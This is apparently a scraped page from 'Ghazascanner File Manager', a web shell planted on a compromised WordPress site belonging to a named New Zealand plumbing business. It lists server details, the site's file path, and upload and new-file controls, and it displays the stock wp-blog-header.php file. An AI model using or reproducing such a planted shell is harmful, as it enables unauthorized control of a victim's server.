@Ghazascanner
_2019runbot
Ghazascanner File Manager
server :Linux plesk-lnx11.1stdomains.net.nz 3.10.0-962.3.2.lve1.5.32.el7.x86_64 #1 SMP Fri Feb 28 07:18:51 EST 2020 x86_64
Current Path :
/
var
/
www
/
vhosts
/
plumber-northshore.co.nz
/
httpdocs
/
Path :
Upload File :
New :
File
Dir
/var/www/vhosts/plumber-northshore.co.nz/httpdocs/wp-blog-header.php
<?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once( dirname( __FILE__ ) . '/wp-load.php' ); // Set up the WordPress query. wp(); // Load the theme template. require_once( ABSPATH . WPINC . '/template-loader.php' ); }